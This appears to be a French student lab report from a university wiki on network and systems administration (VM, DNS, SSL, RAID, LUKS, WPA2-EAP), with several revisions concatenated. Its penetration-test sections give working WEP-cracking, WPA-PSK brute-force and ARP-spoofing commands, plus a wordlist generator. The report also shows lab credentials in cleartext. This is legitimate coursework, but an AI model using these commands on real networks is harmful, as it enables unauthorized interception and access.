604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
@ IN NS ns6.gandi.net.
@ IN MX 100 clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186
IN AAAA [ipv6]

- relancer bind :
service bind9 restart

- pour vérifier :
host -tany clavaire.site

=== Sécurisation site web par certificat ===

Dans un premier temps, nous avons créé un serveur apache2,

systemctl start apache2

Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443

Ajout du certificat SSL

Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé

La commande est disponible par mail: simoninrichard@gmail.com

Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier

Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.

Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.

mailx -f Maildir/

Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.

A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL

Nous devons ensuite activer nos certificats SSL

a2enmod ssl

Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.

Puis un petit restart et notre site est sécurisé.

=== Sécurisation de serveur DNS par DNSSEC ===

Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.

Nous avons vérifié le bon fonctionnement à l'aide de :

https://dnsviz.net/d/clavaire.site/dnssec/

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.

Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.

Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.

aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===

L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.

Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,

sysctl -w net.ipv4.ip_forward=1

Nous commencons ainsi le piratage,

attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186

=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Sécurisation de données ===

On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.
On peut créer le raid :
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7
mkfs.ext4 /dev/md0

Pour qu'il soit monté a chaque démarrage de la vm :
mdadm --monitor --daemonise /dev/md0

Et on l'ajoute au fichier /etc/fstab

Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

=== Sécurisation WiFi par WPA2-EAP ===

==== Configuration borne wifi ====

wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3
wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3
wifi-ima5sc(config)# aaa group server radius radius_group3
wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813
wifi-ima5sc(config-server)#exit
wifi-ima5sc(config)# dot11 ssid SSID_GROUP3
wifi-ima5sc(config-ssid)# mbssid guest-mode
wifi-ima5sc(config-ssid)# vlan 303
wifi-ima5sc(config-ssid)# authentication open eap eap_group3
wifi-ima5sc(config-ssid)# authentication network-eap eap_group3
wifi-ima5sc(config-ssid)# authentication key-management wpa
wifi-ima5sc(config-ssid)#exit

wifi-ima5sc(config)# int Dot11Radio0
wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip
wifi-ima5sc(config-if)# mbssid
wifi-ima5sc(config-if)#exit
wifi-ima5sc(config)# ssid SSID_GROUP3

wifi-ima5sc(config)# int dot11radio0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit

wifi-ima5sc(config)# int Gi0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit
wifi-ima5sc(config)#exit
wifi-ima5sc# write

Nous avons configuré notre routeur wifi à l'aide de notre Vlan.

==== Installation freeRadius ====

Sudo apt install freeradius

dans le fichier
/etc/freeradius/3.0/users

Nous ajoutons une ligne dans le but d'ajouter un utilisateur
pifou Cleartext-Password := "pasglop"

Dans le fichier
/etc/freeradius/3.0/client.conf

Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.

client pra_wifi {
ipaddr = 10.60.100.10
secret = secret_group3 }

Dans le fichier
/etc/freeradius/3.0/mods-enabled/eap

On ajoute la ligne suivante afin de définir le protocole de communication
default_eap_type = peap

Et on peut lancer notre freeradius
freeradius -X

==== DHCP ====
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.

6509E
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

C9200
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

== Site Web ==

Achat de clavaire.site[https://www.clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

== Ferme de serveur ==

Ajout du bridge bridgeStudents sur la VM (fichier .cfg)

commande installation python :
ansible -i clavaire.ini -m raw -a "apt install python -y" all --user root --ask-pass

commande envoi clé ssh :

<nowiki> ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key="{{lookup("file","/root/.ssh/id_rsa.pub")}}"' --user root --ask-pass all</nowiki>

Dockerfile

FROM httpd
COPY ./index.html /usr/local/apache2/htdocs/
CMD [ "httpd", "-D", "FOREGROUND" ]

docker build -t web .

docker run -d web

fichier main.yml

---
- name: "Install docker on host"
hosts: Install_docker
remote_user: root
vars :
"ansible_distribution": "Debian"
"ansible_distribution_release": "buster"
roles:
- role: geerlingguy.docker

- name: "Setup Docker"
hosts: HTTPD
remote_user: root
roles:
- role: HTTPD

TP sysres IMA5sc 2020/2021 G3

2020-12-17T11:45:06Z

Tmertz : /* Ferme de serveur */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.186/28
URL : www.clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

Rename disque et formatage (lvrename/mkfs)

Modif .cfg pour ajouter disques

Transfert fichier /var vers nouvelle partition

Ajoute au /etc/fstab les disques

Mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30

2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0

3. enable

4. conf t

5. ip route 193.48.57.186 255.255.255.255 100.64.0.26

6. exit

7. write

Création du Vlan303 :

Routeur 6509-E

vlan 303
name clavaire303
exit
int vlan 303
no shut
ip address 100.64.0.1 255.255.255.0
exit
vlan 303
vrrp 54 ip 10.60.103.254
vrrp 54 preempt
vrrp 54 priority 110

Routeur C9200

vlan 333
name clavaire303
exit
int vlan 333
no shut
ip address 100.64.0.2 255.255.255.0
exit
vlan 303
vrrp 54 address-family ipv4
address 10.60.103.254
preempt
vrrpv2

== Services Internet ==
=== SSH ===
modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc :
ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
8 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
@ IN NS ns6.gandi.net.
@ IN MX 100 clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186
IN AAAA [ipv6]

- relancer bind :
service bind9 restart

- pour vérifier :
host -tany clavaire.site

=== Sécurisation site web par certificat ===

Dans un premier temps, nous avons créé un serveur apache2,

systemctl start apache2

Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443

Ajout du certificat SSL

Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé

La commande est disponible par mail: simoninrichard@gmail.com

Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier

Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.

Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.

mailx -f Maildir/

Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.

A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL

Nous devons ensuite activer nos certificats SSL

a2enmod ssl

Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.

Puis un petit restart et notre site est sécurisé.

=== Sécurisation de serveur DNS par DNSSEC ===

Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.

Nous avons vérifié le bon fonctionnement à l'aide de :

https://dnsviz.net/d/clavaire.site/dnssec/

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.

Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.

Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.

aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===

L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.

Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,

sysctl -w net.ipv4.ip_forward=1

Nous commencons ainsi le piratage,

attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186

=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Sécurisation de données ===

On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.
On peut créer le raid :
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7
mkfs.ext4 /dev/md0

Pour qu'il soit monté a chaque démarrage de la vm :
mdadm --monitor --daemonise /dev/md0

Et on l'ajoute au fichier /etc/fstab

Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

=== Sécurisation WiFi par WPA2-EAP ===

==== Configuration borne wifi ====

wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3
wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3
wifi-ima5sc(config)# aaa group server radius radius_group3
wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813
wifi-ima5sc(config-server)#exit
wifi-ima5sc(config)# dot11 ssid SSID_GROUP3
wifi-ima5sc(config-ssid)# mbssid guest-mode
wifi-ima5sc(config-ssid)# vlan 303
wifi-ima5sc(config-ssid)# authentication open eap eap_group3
wifi-ima5sc(config-ssid)# authentication network-eap eap_group3
wifi-ima5sc(config-ssid)# authentication key-management wpa
wifi-ima5sc(config-ssid)#exit

wifi-ima5sc(config)# int Dot11Radio0
wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip
wifi-ima5sc(config-if)# mbssid
wifi-ima5sc(config-if)#exit
wifi-ima5sc(config)# ssid SSID_GROUP3

wifi-ima5sc(config)# int dot11radio0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit

wifi-ima5sc(config)# int Gi0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit
wifi-ima5sc(config)#exit
wifi-ima5sc# write

Nous avons configuré notre routeur wifi à l'aide de notre Vlan.

==== Installation freeRadius ====

Sudo apt install freeradius

dans le fichier
/etc/freeradius/3.0/users

Nous ajoutons une ligne dans le but d'ajouter un utilisateur
pifou Cleartext-Password := "pasglop"

Dans le fichier
/etc/freeradius/3.0/client.conf

Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.

client pra_wifi {
ipaddr = 10.60.100.10
secret = secret_group3 }

Dans le fichier
/etc/freeradius/3.0/mods-enabled/eap

On ajoute la ligne suivante afin de définir le protocole de communication
default_eap_type = peap

Et on peut lancer notre freeradius
freeradius -X

==== DHCP ====
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.

6509E
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

C9200
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

== Site Web ==

Achat de clavaire.site[https://www.clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

== Ferme de serveur ==

Ajout du bridge bridgeStudents sur la VM (fichier .cfg)

commande installation python :
ansible -i clavaire.ini -m raw -a "apt install python -y" all --user root --ask-pass

commande envoi clé ssh :

<nowiki> ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key="{{lookup("file","/root/.ssh/id_rsa.pub")}}"' --user root --ask-pass all</nowiki>

Dockerfile

FROM httpd
COPY ./index.html /usr/local/apache2/htdocs/
CMD [ "httpd", "-D", "FOREGROUND" ]

docker build -t web .

docker run -d web

TP sysres IMA5sc 2020/2021 G3

2020-12-17T10:34:22Z

Tmertz : /* Ferme de serveur */

TP sysres IMA5sc 2020/2021 G3

2020-12-17T10:30:16Z

Tmertz : /* Ferme de serveur */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.186/28
URL : www.clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

Rename disque et formatage (lvrename/mkfs)

Modif .cfg pour ajouter disques

Transfert fichier /var vers nouvelle partition

Ajoute au /etc/fstab les disques

Mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30

2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0

3. enable

4. conf t

5. ip route 193.48.57.186 255.255.255.255 100.64.0.26

6. exit

7. write

Création du Vlan303 :

Routeur 6509-E

vlan 303
name clavaire303
exit
int vlan 303
no shut
ip address 100.64.0.1 255.255.255.0
exit
vlan 303
vrrp 54 ip 10.60.103.254
vrrp 54 preempt
vrrp 54 priority 110

Routeur C9200

vlan 333
name clavaire303
exit
int vlan 333
no shut
ip address 100.64.0.2 255.255.255.0
exit
vlan 303
vrrp 54 address-family ipv4
address 10.60.103.254
preempt
vrrpv2

== Services Internet ==
=== SSH ===
modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc :
ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
8 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
@ IN NS ns6.gandi.net.
@ IN MX 100 clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186
IN AAAA [ipv6]

- relancer bind :
service bind9 restart

- pour vérifier :
host -tany clavaire.site

=== Sécurisation site web par certificat ===

Dans un premier temps, nous avons créé un serveur apache2,

systemctl start apache2

Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443

Ajout du certificat SSL

Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé

La commande est disponible par mail: simoninrichard@gmail.com

Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier

Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.

Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.

mailx -f Maildir/

Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.

A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL

Nous devons ensuite activer nos certificats SSL

a2enmod ssl

Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.

Puis un petit restart et notre site est sécurisé.

=== Sécurisation de serveur DNS par DNSSEC ===

Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.

Nous avons vérifié le bon fonctionnement à l'aide de :

https://dnsviz.net/d/clavaire.site/dnssec/

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.

Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.

Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.

aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===

L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.

Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,

sysctl -w net.ipv4.ip_forward=1

Nous commencons ainsi le piratage,

attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186

=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Sécurisation de données ===

On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.
On peut créer le raid :
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7
mkfs.ext4 /dev/md0

Pour qu'il soit monté a chaque démarrage de la vm :
mdadm --monitor --daemonise /dev/md0

Et on l'ajoute au fichier /etc/fstab

Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

